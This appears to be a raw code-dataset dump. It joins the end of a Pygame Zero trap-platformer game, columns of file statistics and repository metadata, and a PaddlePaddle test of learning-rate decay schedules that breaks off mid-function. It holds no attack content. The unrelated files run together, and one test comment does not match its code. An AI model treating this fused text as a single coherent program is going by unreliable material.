if spine.name in ("trap1","trap2","trap3") and player.colliderect(spine):
player.death=True
for point in spine.points:
if player.collidepoint(point):
player.death=True
for apple in apples:
if player.colliderect(apple):
player.death=True
for button in buttons:
if player.colliderect(button):
button.image='button_pressed'
button.bottomright=(1280,BOTTOM)
for platform in platforms:
if platform.name=='platform1':
if buttons[0].image=='button_pressed' and not platform.animate_acted:
animate(platform,tween='accelerate', duration=0.3,pos=(platform.pos[0],platform.pos[1]+160))
platform.animate_acted=True
sounds.up.play()
clock.schedule_unique(recover_platform,1)
elif platform.name=='platform2':
if player.right<platform.right and player.bottom==platform.top and not platform.animate_acted:
animate(platform,tween='linear', duration=4,pos=(platform.pos[0],platform.pos[1]-600))
sounds.up.play()
platform.animate_acted=True
elif platform.name=='platform3':
if player.left>platform.left and player.bottom==platform.top and not platform.animate_acted:
animate(platform,tween='accelerate', duration=0.5,pos=(platform.pos[0],platform.pos[1]+1000))
platform.animate_acted=True
def wgcupdate():
global music_played
#陷阱
for spine in spines:
if spine.name=='trap1'and player.left-spine.right>10 and player.bottom<=spine.bottom :
if not spine.animate_acted:
sounds.up.play()
spine.angle-=90
animate(spine,tween='linear', duration=4,pos=(spine.pos[0]+1000,spine.pos[1]))
spine.animate_acted=True
if spine.name=='trap2'and spine.right-player.left>3 and player.bottom<=spine.top :
if not spine.animate_acted:
sounds.up.play()
spine.image='spine_left_long'
spine.animate_acted=True
if spine.name=='trap3'and player.height-spine.height<=10 and spine.left<=player.right:
if not spine.animate_acted:
sounds.up.play()
spine.angle-=0
animate(spine,tween='linear', duration=2,pos=(spine.pos[0],spine.pos[0]-900))
spine.animate_acted=True
if spine.name=='trap4'and player.right>=(720) and player.bottom>=( 300) :
if not spine.animate_acted:
sounds.up.play()
spine.angle-=90
animate(spine,tween='linear', duration=1,pos=(spine.pos[0]+1300,spine.pos[1]))
spine.animate_acted=True
if spine.name=='trap5'and player.right>=(620) and player.bottom<=(100) :
if not spine.animate_acted:
sounds.up.play()
spine.angle-=0
animate(spine,tween='linear', duration=5,pos=(spine.pos[0]-1900,spine.pos[1]))
spine.animate_acted=True
if spine.name=='trap6'and player.right>=(1100) and player.top>=550 :
if not spine.animate_acted:
sounds.up.play()
spine.angle-=0
animate(spine,tween='linear', duration=1,pos=(spine.pos[0]+1000,spine.pos[1]))
spine.animate_acted=True
if not test_mode:
#碰撞检测
for spine in spines:
if spine.name in ("trap1","trap2","trap3","trap4","trap5","trap6","trap7") and player.colliderect(spine):
player.death=True
else:
for point in spine.points:
if player.collidepoint(point):
player.death=True
for platform in platforms:
if platform.name=='platform2':
if player.right<platform.right and player.bottom==platform.top and not platform.animate_acted:
animate(platform,tween='linear', duration=4,pos=(platform.pos[0],platform.pos[1]-600))
platform.animate_acted=True
elif platform.name=='platform3':
if player.left>platform.left and player.bottom==platform.top and not platform.animate_acted:
animate(platform,tween='accelerate', duration=0.5,pos=(platform.pos[0],platform.pos[1]+1000))
platform.animate_acted=True
def endupdate():
global music_played,death_count
a_num=len(apples)
if a_num<=100:
apple=Actor('apple')
apple.topleft=(random.randint(0,1250),0)
apple.ay=0.5
apple.vy=0
apple.name='normal'
apples.append(apple)
for apple in apples:
if apple.name=='normal':
apple.vy+=apple.ay
apple.top+=apple.vy
if apple.top>720: apples.remove(apple)
toc=time.time()
global death_end
if (toc-tic)>=40:
apple=Actor('bigapple')
apple.bottomleft=(0,0)
apple.name='bigapple'
apples.append(apple)
if not death_end:
animate(apple,tween='accelerate', duration=1,pos=(apple.pos[0],apple.pos[1]+1000))
death_count+=1
death_end=True
for apple in apples:
if apple.name=='bigapple':
if player.colliderect(apple):player.death=True
#运动
player.jumptime=0#无限跳跃
player.left+=player.vx
if player.bottom<=1000:player.bottom+=player.vy#<1000是为了防止死亡后一直下落
init()
pgzrun.go()
| 29.82265
| 199
| 0.60961
| 5,310
| 41,871
| 4.751977
| 0.075895
| 0.039472
| 0.02897
| 0.022193
| 0.820473
| 0.789561
| 0.773194
| 0.74676
| 0.702968
| 0.674395
| 0
| 0.050845
| 0.255021
| 41,871
| 1,403
| 200
| 29.843906
| 0.758087
| 0.016551
| 0
| 0.723366
| 0
| 0
| 0.071213
| 0.001925
| 0
| 0
| 0
| 0
| 0
| 1
| 0.016115
| false
| 0
| 0.004476
| 0
| 0.020591
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
35633fbec43078eb5563fb3bccbe2c25c6bb37ca
| 38,124
|
py
|
Python
|
framework_api/test_dy_learningrate_cpu.py
|
zjjlivein/continuous_integration
|
c8825f32136fdd425389702c37ded08d6fd28a26
|
[
"Apache-2.0"
] | 14
|
2020-03-04T07:52:07.000Z
|
2022-02-14T01:39:14.000Z
|
framework_api/test_dy_learningrate_cpu.py
|
zjjlivein/continuous_integration
|
c8825f32136fdd425389702c37ded08d6fd28a26
|
[
"Apache-2.0"
] | 19
|
2020-03-04T03:52:10.000Z
|
2021-12-23T07:02:07.000Z
|
framework_api/test_dy_learningrate_cpu.py
|
zjjlivein/continuous_integration
|
c8825f32136fdd425389702c37ded08d6fd28a26
|
[
"Apache-2.0"
] | 26
|
2020-03-04T05:39:09.000Z
|
2022-02-14T01:43:28.000Z
|
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""test dygraph learningrate."""
import paddle.fluid as fluid
import numpy as np
import tools
import math
cpu = fluid.CPUPlace()
def test_PiecewiseDecay():
"""
test PiecewiseDecay
:return:
"""
with fluid.dygraph.guard(cpu):
seed = 33
np.random.seed(seed)
fluid.default_startup_program().random_seed = seed
fluid.default_main_program().random_seed = seed
classdim = 7
x = fluid.dygraph.to_variable(
np.arange(0, 21).astype('float32').reshape(3, 7))
label = fluid.dygraph.to_variable(
np.arange(0, 3).astype('int64').reshape(3, 1))
# basic test
boundaries = [10, 20]
values = [1.0, 0.5, 0.1]
res = []
fc = fluid.dygraph.Linear(
input_dim=7, output_dim=classdim, act='softmax')
sgd_optimizer = fluid.optimizer.SGD(
learning_rate=fluid.dygraph.PiecewiseDecay(boundaries, values, 0),
parameter_list=fc.parameters())
for step in range(30):
predict = fc(x)
cost = fluid.layers.cross_entropy(input=predict, label=label)
cost.backward()
sgd_optimizer.minimize(cost)
res.append(sgd_optimizer._global_learning_rate().numpy()[0])
exp = [1 for i in range(10)] + [0.5 for i in range(10)
] + [0.1 for i in range(10)]
tools.compare(res, exp)
# set step boundaries * 2
boundaries = [20, 40]
values = [1.0, 0.5, 0.1]
res = []
fc = fluid.dygraph.Linear(
input_dim=7, output_dim=classdim, act='softmax')
sgd_optimizer = fluid.optimizer.SGD(
learning_rate=fluid.dygraph.PiecewiseDecay(
boundaries, values, 0, step=2),
parameter_list=fc.parameters())
for step in range(30):
predict = fc(x)
cost = fluid.layers.cross_entropy(input=predict, label=label)
cost.backward()
sgd_optimizer.minimize(cost)
res.append(sgd_optimizer._global_learning_rate().numpy()[0])
exp = [1 for i in range(10)] + [0.5 for i in range(10)
] + [0.1 for i in range(10)]
tools.compare(res, exp)
# set begin=5 => 1*5 + 0.5 *10 + 0.1 * 15
boundaries = [10, 20]
values = [1.0, 0.5, 0.1]
res = []
fc = fluid.dygraph.Linear(
input_dim=7, output_dim=classdim, act='softmax')
sgd_optimizer = fluid.optimizer.SGD(
learning_rate=fluid.dygraph.PiecewiseDecay(boundaries, values, 5),
parameter_list=fc.parameters())
for step in range(30):
predict = fc(x)
cost = fluid.layers.cross_entropy(input=predict, label=label)
cost.backward()
sgd_optimizer.minimize(cost)
res.append(sgd_optimizer._global_learning_rate().numpy()[0])
exp = [1 for i in range(5)] + [0.5 for i in range(10)
] + [0.1 for i in range(15)]
tools.compare(res, exp)
def test_CosineDecay():
"""
test CosineDecay 余弦衰减学习率
:return:
"""
with fluid.dygraph.guard(cpu):
seed = 33
np.random.seed(seed)
fluid.default_startup_program().random_seed = seed
fluid.default_main_program().random_seed = seed
classdim = 7
# x = fluid.layers.data(name='x', shape=[3, 7], dtype='float32', append_batch_size=False)
# label = fluid.layers.data(name='label', shape=[3, 1], dtype='int64', append_batch_size=False)
x = fluid.dygraph.to_variable(
np.arange(0, 21).astype('float32').reshape(3, 7))
label = fluid.dygraph.to_variable(
np.arange(0, 3).astype('int64').reshape(3, 1))
label.stop_gradient = True
# basic test
res = []
fc = fluid.dygraph.Linear(
input_dim=7, output_dim=classdim, act='softmax')
sgd_optimizer = fluid.optimizer.SGD(
learning_rate=fluid.dygraph.CosineDecay(
learning_rate=1, step_each_epoch=3, epochs=3),
parameter_list=fc.parameters())
for epoch in range(3):
for step in range(3):
predict = fc(x)
cost = fluid.layers.cross_entropy(input=predict, label=label)
cost.backward()
sgd_optimizer.minimize(cost)
res.append(sgd_optimizer._global_learning_rate().numpy()[0])
exp = [1, 1, 1, 0.75, 0.75, 0.75, 0.25, 0.25, 0.25]
tools.compare(res, exp)
# more epochs
res = []
fc = fluid.dygraph.Linear(
input_dim=7, output_dim=classdim, act='softmax')
sgd_optimizer = fluid.optimizer.SGD(
learning_rate=fluid.dygraph.CosineDecay(
learning_rate=1, step_each_epoch=10, epochs=3),
parameter_list=fc.parameters())
for epoch in range(3):
for step in range(10):
predict = fc(x)
cost = fluid.layers.cross_entropy(input=predict, label=label)
cost.backward()
sgd_optimizer.minimize(cost)
res.append(sgd_optimizer._global_learning_rate().numpy()[0])
exp = [
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75,
0.75, 0.75, 0.75, 0.75, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25,
0.25, 0.25, 0.25
]
tools.compare(res, exp)
# step = 2 allstep = 20
res = []
fc = fluid.dygraph.Linear(
input_dim=7, output_dim=classdim, act='softmax')
sgd_optimizer = fluid.optimizer.SGD(
learning_rate=fluid.dygraph.CosineDecay(
learning_rate=1, step_each_epoch=20, step=2, epochs=3),
parameter_list=fc.parameters())
for epoch in range(3):
for step in range(10):
predict = fc(x)
cost = fluid.layers.cross_entropy(input=predict, label=label)
cost.backward()
sgd_optimizer.minimize(cost)
res.append(sgd_optimizer._global_learning_rate().numpy()[0])
exp = [
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75,
0.75, 0.75, 0.75, 0.75, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25,
0.25, 0.25, 0.25
]
tools.compare(res, exp)
# step = 2 allstep = 20
res = []
fc = fluid.dygraph.Linear(
input_dim=7, output_dim=classdim, act='softmax')
sgd_optimizer = fluid.optimizer.SGD(
learning_rate=fluid.dygraph.CosineDecay(
learning_rate=1, step_each_epoch=20, step=2, epochs=3),
parameter_list=fc.parameters())
for epoch in range(3):
for step in range(10):
predict = fc(x)
cost = fluid.layers.cross_entropy(input=predict, label=label)
cost.backward()
sgd_optimizer.minimize(cost)
res.append(sgd_optimizer._global_learning_rate().numpy()[0])
exp = [
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75,
0.75, 0.75, 0.75, 0.75, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25,
0.25, 0.25, 0.25
]
tools.compare(res, exp)
# begin = 5 allstep = 15
res = []
fc = fluid.dygraph.Linear(
input_dim=7, output_dim=classdim, act='softmax')
sgd_optimizer = fluid.optimizer.SGD(
learning_rate=fluid.dygraph.CosineDecay(
learning_rate=1, step_each_epoch=20, step=2, epochs=3),
parameter_list=fc.parameters())
for epoch in range(3):
for step in range(10):
predict = fc(x)
cost = fluid.layers.cross_entropy(input=predict, label=label)
cost.backward()
sgd_optimizer.minimize(cost)
res.append(sgd_optimizer._global_learning_rate().numpy()[0])
exp = [
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75,
0.75, 0.75, 0.75, 0.75, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25,
0.25, 0.25, 0.25
]
tools.compare(res, exp)
def test_ExponentialDecay():
"""
test ExponentialDecay 指数衰减
:return:
"""
with fluid.dygraph.guard(cpu):
seed = 33
np.random.seed(seed)
fluid.default_startup_program().random_seed = seed
fluid.default_main_program().random_seed = seed
classdim = 7
x = fluid.dygraph.to_variable(
np.arange(0, 21).astype('float32').reshape(3, 7))
label = fluid.dygraph.to_variable(
np.arange(0, 3).astype('int64').reshape(3, 1))
label.stop_gradient = True
# basic test
res = []
fc = fluid.dygraph.Linear(
input_dim=7, output_dim=classdim, act='softmax')
sgd_optimizer = fluid.optimizer.SGD(
learning_rate=fluid.dygraph.ExponentialDecay(
learning_rate=1, decay_steps=3, decay_rate=0.5,
staircase=False),
parameter_list=fc.parameters())
for step in range(9):
predict = fc(x)
cost = fluid.layers.cross_entropy(input=predict, label=label)
cost.backward()
sgd_optimizer.minimize(cost)
res.append(sgd_optimizer._global_learning_rate().numpy()[0])
exp = [
1.0, 0.7937005, 0.62996054, 0.5, 0.39685026, 0.31498027, 0.25,
0.19842514, 0.15749012
]
tools.compare(res, exp)
# staircase = True
res = []
fc = fluid.dygraph.Linear(
input_dim=7, output_dim=classdim, act='softmax')
sgd_optimizer = fluid.optimizer.SGD(
learning_rate=fluid.dygraph.ExponentialDecay(
learning_rate=1, decay_steps=3, decay_rate=0.5, staircase=True),
parameter_list=fc.parameters())
for step in range(9):
predict = fc(x)
cost = fluid.layers.cross_entropy(input=predict, label=label)
cost.backward()
sgd_optimizer.minimize(cost)
res.append(sgd_optimizer._global_learning_rate().numpy()[0])
exp = [1.0, 1.0, 1.0, 0.5, 0.5, 0.5, 0.25, 0.25, 0.25]
tools.compare(res, exp)
# staircase = True begin = 1 相当于 全局step + begin
res = []
fc = fluid.dygraph.Linear(
input_dim=7, output_dim=classdim, act='softmax')
sgd_optimizer = fluid.optimizer.SGD(
learning_rate=fluid.dygraph.ExponentialDecay(
learning_rate=1,
decay_steps=3,
decay_rate=0.5,
begin=1,
staircase=True),
parameter_list=fc.parameters())
for step in range(9):
predict = fc(x)
cost = fluid.layers.cross_entropy(input=predict, label=label)
cost.backward()
sgd_optimizer.minimize(cost)
res.append(sgd_optimizer._global_learning_rate().numpy()[0])
exp = [1.0, 1.0, 0.5, 0.5, 0.5, 0.25, 0.25, 0.25, 0.125]
tools.compare(res, exp)
# staircase = True step = 2 相当于 全局step*2 + begin
res = []
fc = fluid.dygraph.Linear(
input_dim=7, output_dim=classdim, act='softmax')
sgd_optimizer = fluid.optimizer.SGD(
learning_rate=fluid.dygraph.ExponentialDecay(
learning_rate=1,
decay_steps=3,
decay_rate=0.5,
step=2,
staircase=True),
parameter_list=fc.parameters())
for step in range(9):
predict = fc(x)
cost = fluid.layers.cross_entropy(input=predict, label=label)
cost.backward()
sgd_optimizer.minimize(cost)
res.append(sgd_optimizer._global_learning_rate().numpy()[0])
exp = [1.0, 1.0, 0.5, 0.25, 0.25, 0.125, 0.0625, 0.0625, 0.03125]
tools.compare(res, exp)
def test_InverseTimeDecay():
"""
test InverseTimeDecay 反时限衰减学习率
:return:
"""
with fluid.dygraph.guard(cpu):
seed = 33
np.random.seed(seed)
fluid.default_startup_program().random_seed = seed
fluid.default_main_program().random_seed = seed
classdim = 7
x = fluid.dygraph.to_variable(
np.arange(0, 21).astype('float32').reshape(3, 7))
label = fluid.dygraph.to_variable(
np.arange(0, 3).astype('int64').reshape(3, 1))
label.stop_gradient = True
# basic test
res = []
fc = fluid.dygraph.Linear(
input_dim=7, output_dim=classdim, act='softmax')
sgd_optimizer = fluid.optimizer.SGD(
learning_rate=fluid.dygraph.InverseTimeDecay(
learning_rate=1, decay_steps=3, decay_rate=0.5,
staircase=False),
parameter_list=fc.parameters())
for step in range(9):
predict = fc(x)
cost = fluid.layers.cross_entropy(input=predict, label=label)
cost.backward()
sgd_optimizer.minimize(cost)
res.append(sgd_optimizer._global_learning_rate().numpy()[0])
exp = [
1.0, 0.85714287, 0.75, 0.6666667, 0.59999996, 0.54545456, 0.5,
0.4615385, 0.4285714
]
tools.compare(res, exp)
# decay_rate = 1
res = []
fc = fluid.dygraph.Linear(
input_dim=7, output_dim=classdim, act='softmax')
sgd_optimizer = fluid.optimizer.SGD(
learning_rate=fluid.dygraph.InverseTimeDecay(
learning_rate=1, decay_steps=3, decay_rate=1, staircase=False),
parameter_list=fc.parameters())
for step in range(9):
predict = fc(x)
cost = fluid.layers.cross_entropy(input=predict, label=label)
cost.backward()
sgd_optimizer.minimize(cost)
res.append(sgd_optimizer._global_learning_rate().numpy()[0])
exp = []
# 衰减算法
for i in range(9):
tmp = 1 / (1 + 1 * i / 3)
exp.append(tmp)
tools.compare(res, exp)
# staircase = True
res = []
fc = fluid.dygraph.Linear(
input_dim=7, output_dim=classdim, act='softmax')
sgd_optimizer = fluid.optimizer.SGD(
learning_rate=fluid.dygraph.InverseTimeDecay(
learning_rate=1, decay_steps=3, decay_rate=0.5, staircase=True),
parameter_list=fc.parameters())
for step in range(9):
predict = fc(x)
cost = fluid.layers.cross_entropy(input=predict, label=label)
cost.backward()
sgd_optimizer.minimize(cost)
res.append(sgd_optimizer._global_learning_rate().numpy()[0])
exp = [1.0, 1.0, 1.0, 0.6666667, 0.6666667, 0.6666667, 0.5, 0.5, 0.5]
tools.compare(res, exp)
# begin = 1
res = []
fc = fluid.dygraph.Linear(
input_dim=7, output_dim=classdim, act='softmax')
sgd_optimizer = fluid.optimizer.SGD(
learning_rate=fluid.dygraph.InverseTimeDecay(
learning_rate=1,
decay_steps=3,
decay_rate=0.5,
begin=1,
staircase=True),
parameter_list=fc.parameters())
for step in range(9):
predict = fc(x)
cost = fluid.layers.cross_entropy(input=predict, label=label)
cost.backward()
sgd_optimizer.minimize(cost)
res.append(sgd_optimizer._global_learning_rate().numpy()[0])
exp = [1.0, 1.0, 0.6666667, 0.6666667, 0.6666667, 0.5, 0.5, 0.5, 0.4]
tools.compare(res, exp)
# step = 2
res = []
fc = fluid.dygraph.Linear(
input_dim=7, output_dim=classdim, act='softmax')
sgd_optimizer = fluid.optimizer.SGD(
learning_rate=fluid.dygraph.InverseTimeDecay(
learning_rate=1,
decay_steps=3,
decay_rate=0.5,
step=2,
staircase=True),
parameter_list=fc.parameters())
for step in range(9):
predict = fc(x)
cost = fluid.layers.cross_entropy(input=predict, label=label)
cost.backward()
sgd_optimizer.minimize(cost)
res.append(sgd_optimizer._global_learning_rate().numpy()[0])
exp = [
1.0, 1.0, 0.6666667, 0.5, 0.5, 0.4, 0.33333334, 0.33333334,
0.2857143
]
tools.compare(res, exp)
def test_NaturalExpDecay():
"""
test NaturalExpDecay 自然指数衰减学习率
:return:
"""
with fluid.dygraph.guard(cpu):
seed = 33
np.random.seed(seed)
fluid.default_startup_program().random_seed = seed
fluid.default_main_program().random_seed = seed
classdim = 7
x = fluid.dygraph.to_variable(
np.arange(0, 21).astype('float32').reshape(3, 7))
label = fluid.dygraph.to_variable(
np.arange(0, 3).astype('int64').reshape(3, 1))
label.stop_gradient = True
# basic test
res = []
fc = fluid.dygraph.Linear(
input_dim=7, output_dim=classdim, act='softmax')
sgd_optimizer = fluid.optimizer.SGD(
learning_rate=fluid.dygraph.NaturalExpDecay(
learning_rate=1, decay_steps=3, decay_rate=0.5,
staircase=False),
parameter_list=fc.parameters())
for step in range(9):
predict = fc(x)
cost = fluid.layers.cross_entropy(input=predict, label=label)
cost.backward()
sgd_optimizer.minimize(cost)
res.append(sgd_optimizer._global_learning_rate().numpy()[0])
# 衰减算法
exp = []
for i in range(9):
tmp = 1 * math.exp(-0.5 * i / 3)
exp.append(tmp)
tools.compare(res, exp)
# staircase = True
res = []
fc = fluid.dygraph.Linear(
input_dim=7, output_dim=classdim, act='softmax')
sgd_optimizer = fluid.optimizer.SGD(
learning_rate=fluid.dygraph.NaturalExpDecay(
learning_rate=1, decay_steps=3, decay_rate=0.5, staircase=True),
parameter_list=fc.parameters())
for step in range(9):
predict = fc(x)
cost = fluid.layers.cross_entropy(input=predict, label=label)
cost.backward()
sgd_optimizer.minimize(cost)
res.append(sgd_optimizer._global_learning_rate().numpy()[0])
# 衰减算法
exp = []
for i in range(9):
tmp = 1 * math.exp(-0.5 * math.floor(i / 3))
exp.append(tmp)
tools.compare(res, exp)
# decay_rate = 0.3
res = []
fc = fluid.dygraph.Linear(
input_dim=7, output_dim=classdim, act='softmax')
sgd_optimizer = fluid.optimizer.SGD(
learning_rate=fluid.dygraph.NaturalExpDecay(
learning_rate=1, decay_steps=3, decay_rate=0.3, staircase=True),
parameter_list=fc.parameters())
for step in range(9):
predict = fc(x)
cost = fluid.layers.cross_entropy(input=predict, label=label)
cost.backward()
sgd_optimizer.minimize(cost)
res.append(sgd_optimizer._global_learning_rate().numpy()[0])
# 衰减算法
exp = []
for i in range(9):
tmp = 1 * math.exp(-0.3 * math.floor(i / 3))
exp.append(tmp)
tools.compare(res, exp)
# decay_rate = 0.5 begin = 2
res = []
fc = fluid.dygraph.Linear(
input_dim=7, output_dim=classdim, act='softmax')
sgd_optimizer = fluid.optimizer.SGD(
learning_rate=fluid.dygraph.NaturalExpDecay(
learning_rate=1,
decay_steps=3,
decay_rate=0.5,
begin=2,
staircase=True),
parameter_list=fc.parameters())
for step in range(9):
predict = fc(x)
cost = fluid.layers.cross_entropy(input=predict, label=label)
cost.backward()
sgd_optimizer.minimize(cost)
res.append(sgd_optimizer._global_learning_rate().numpy()[0])
# 衰减算法
exp = []
for i in range(9):
tmp = 1 * math.exp(-0.5 * math.floor((i + 2) / 3))
exp.append(tmp)
tools.compare(res, exp)
# decay_rate = 0.5 begin = 2 step = 2
res = []
fc = fluid.dygraph.Linear(
input_dim=7, output_dim=classdim, act='softmax')
sgd_optimizer = fluid.optimizer.SGD(
learning_rate=fluid.dygraph.NaturalExpDecay(
learning_rate=1,
decay_steps=3,
decay_rate=0.5,
begin=2,
step=2,
staircase=True),
parameter_list=fc.parameters())
for step in range(9):
predict = fc(x)
cost = fluid.layers.cross_entropy(input=predict, label=label)
cost.backward()
sgd_optimizer.minimize(cost)
res.append(sgd_optimizer._global_learning_rate().numpy()[0])
# 衰减算法
exp = []
for i in range(9):
tmp = 1 * math.exp(-0.5 * math.floor((i * 2 + 2) / 3))
exp.append(tmp)
tools.compare(res, exp)
def test_PolynomialDecay():
"""
test PolynomialDecay 多项式衰减学习率
:return:
"""
with fluid.dygraph.guard(cpu):
seed = 33
np.random.seed(seed)
fluid.default_startup_program().random_seed = seed
fluid.default_main_program().random_seed = seed
classdim = 7
x = fluid.dygraph.to_variable(
np.arange(0, 21).astype('float32').reshape(3, 7))
label = fluid.dygraph.to_variable(
np.arange(0, 3).astype('int64').reshape(3, 1))
label.stop_gradient = True
# basic test
res = []
fc = fluid.dygraph.Linear(
input_dim=7, output_dim=classdim, act='softmax')
sgd_optimizer = fluid.optimizer.SGD(
learning_rate=fluid.dygraph.PolynomialDecay(
learning_rate=1,
decay_steps=5,
end_learning_rate=0,
power=1.0, ),
parameter_list=fc.parameters())
for step in range(9):
predict = fc(x)
cost = fluid.layers.cross_entropy(input=predict, label=label)
cost.backward()
sgd_optimizer.minimize(cost)
res.append(sgd_optimizer._global_learning_rate().numpy()[0])
# 衰减算法
exp = []
for i in range(9):
i = min(i, 5)
tmp = (1 - 0) * (1 - i / 5)**1.0 + 0
exp.append(tmp)
tools.compare(res, exp)
# power = 2.0
res = []
fc = fluid.dygraph.Linear(
input_dim=7, output_dim=classdim, act='softmax')
sgd_optimizer = fluid.optimizer.SGD(
learning_rate=fluid.dygraph.PolynomialDecay(
learning_rate=1,
decay_steps=5,
end_learning_rate=0,
power=2.0, ),
parameter_list=fc.parameters())
for step in range(9):
predict = fc(x)
cost = fluid.layers.cross_entropy(input=predict, label=label)
cost.backward()
sgd_optimizer.minimize(cost)
res.append(sgd_optimizer._global_learning_rate().numpy()[0])
# 衰减算法
exp = []
for i in range(9):
i = min(i, 5)
tmp = (1 - 0) * (1 - i / 5)**2.0 + 0
exp.append(tmp)
tools.compare(res, exp)
# decay_steps = 3.0
res = []
fc = fluid.dygraph.Linear(
input_dim=7, output_dim=classdim, act='softmax')
sgd_optimizer = fluid.optimizer.SGD(
learning_rate=fluid.dygraph.PolynomialDecay(
learning_rate=1,
decay_steps=3,
end_learning_rate=0,
power=1.0, ),
parameter_list=fc.parameters())
for step in range(9):
predict = fc(x)
cost = fluid.layers.cross_entropy(input=predict, label=label)
cost.backward()
sgd_optimizer.minimize(cost)
res.append(sgd_optimizer._global_learning_rate().numpy()[0])
# 衰减算法
exp = []
for i in range(9):
i = min(i, 3)
tmp = (1 - 0) * (1 - i / 3)**1.0 + 0
exp.append(tmp)
tools.compare(res, exp)
# end_learning_rate = 0.5
res = []
fc = fluid.dygraph.Linear(
input_dim=7, output_dim=classdim, act='softmax')
sgd_optimizer = fluid.optimizer.SGD(
learning_rate=fluid.dygraph.PolynomialDecay(
learning_rate=1,
decay_steps=7,
end_learning_rate=0.5,
power=1.0, ),
parameter_list=fc.parameters())
for step in range(9):
predict = fc(x)
cost = fluid.layers.cross_entropy(input=predict, label=label)
cost.backward()
sgd_optimizer.minimize(cost)
res.append(sgd_optimizer._global_learning_rate().numpy()[0])
# 衰减算法
exp = []
for i in range(9):
i = min(i, 7)
tmp = (1 - 0.5) * (1 - i / 7)**1.0 + 0.5
exp.append(tmp)
tools.compare(res, exp)
# learning_rate = 2
res = []
fc = fluid.dygraph.Linear(
input_dim=7, output_dim=classdim, act='softmax')
sgd_optimizer = fluid.optimizer.SGD(
learning_rate=fluid.dygraph.PolynomialDecay(
learning_rate=2,
decay_steps=7,
end_learning_rate=0.5,
power=1.0, ),
parameter_list=fc.parameters())
for step in range(9):
predict = fc(x)
cost = fluid.layers.cross_entropy(input=predict, label=label)
cost.backward()
sgd_optimizer.minimize(cost)
res.append(sgd_optimizer._global_learning_rate().numpy()[0])
# 衰减算法
exp = []
for i in range(9):
i = min(i, 7)
tmp = (2 - 0.5) * (1 - i / 7)**1.0 + 0.5
exp.append(tmp)
tools.compare(res, exp)
# learning_rate = 2 begin =1
res = []
fc = fluid.dygraph.Linear(
input_dim=7, output_dim=classdim, act='softmax')
sgd_optimizer = fluid.optimizer.SGD(
learning_rate=fluid.dygraph.PolynomialDecay(
learning_rate=2,
decay_steps=7,
end_learning_rate=0.5,
begin=1,
power=1.0),
parameter_list=fc.parameters())
for step in range(9):
predict = fc(x)
cost = fluid.layers.cross_entropy(input=predict, label=label)
cost.backward()
sgd_optimizer.minimize(cost)
res.append(sgd_optimizer._global_learning_rate().numpy()[0])
# 衰减算法
exp = []
for i in range(9):
i = min(i + 1, 7)
tmp = (2 - 0.5) * (1 - i / 7)**1.0 + 0.5
exp.append(tmp)
tools.compare(res, exp)
# learning_rate = 2 begin =1 step = 2
res = []
fc = fluid.dygraph.Linear(
input_dim=7, output_dim=classdim, act='softmax')
sgd_optimizer = fluid.optimizer.SGD(
learning_rate=fluid.dygraph.PolynomialDecay(
learning_rate=2,
decay_steps=7,
end_learning_rate=0.5,
begin=1,
step=2,
power=1.0),
parameter_list=fc.parameters())
for step in range(9):
predict = fc(x)
cost = fluid.layers.cross_entropy(input=predict, label=label)
cost.backward()
sgd_optimizer.minimize(cost)
res.append(sgd_optimizer._global_learning_rate().numpy()[0])
# 衰减算法
exp = []
for i in range(9):
i = min(i * 2 + 1, 7)
tmp = (2 - 0.5) * (1 - i / 7)**1.0 + 0.5
exp.append(tmp)
tools.compare(res, exp)
# cycle = True
res = []
fc = fluid.dygraph.Linear(
input_dim=7, output_dim=classdim, act='softmax')
sgd_optimizer = fluid.optimizer.SGD(
learning_rate=fluid.dygraph.PolynomialDecay(
learning_rate=2,
decay_steps=7,
end_learning_rate=0.5,
power=1.0,
cycle=True),
parameter_list=fc.parameters())
for step in range(20):
predict = fc(x)
cost = fluid.layers.cross_entropy(input=predict, label=label)
cost.backward()
sgd_optimizer.minimize(cost)
res.append(sgd_optimizer._global_learning_rate().numpy()[0])
# 衰减算法
exp = []
for i in range(20):
lr = math.ceil(i / 7)
if lr == 0:
lr = 1
tmp = 7 * lr
tmp = (2 - 0.5) * (1 - i / tmp)**1.0 + 0.5
exp.append(tmp)
tools.compare(res, exp)
# cycle = True begin = 2
res = []
fc = fluid.dygraph.Linear(
input_dim=7, output_dim=classdim, act='softmax')
sgd_optimizer = fluid.optimizer.SGD(
learning_rate=fluid.dygraph.PolynomialDecay(
learning_rate=2,
decay_steps=7,
end_learning_rate=0.5,
power=1.0,
begin=2,
cycle=True),
parameter_list=fc.parameters())
for step in range(20):
predict = fc(x)
cost = fluid.layers.cross_entropy(input=predict, label=label)
cost.backward()
sgd_optimizer.minimize(cost)
res.append(sgd_optimizer._global_learning_rate().numpy()[0])
# 衰减算法
exp = []
for i in range(20):
lr = math.ceil((i + 2) / 7)
if lr == 0:
lr = 1
tmp = 7 * lr
tmp = (2 - 0.5) * (1 - (i + 2) / tmp)**1.0 + 0.5
exp.append(tmp)
tools.compare(res, exp)
# cycle = True begin = 2 step = 2
res = []
fc = fluid.dygraph.Linear(
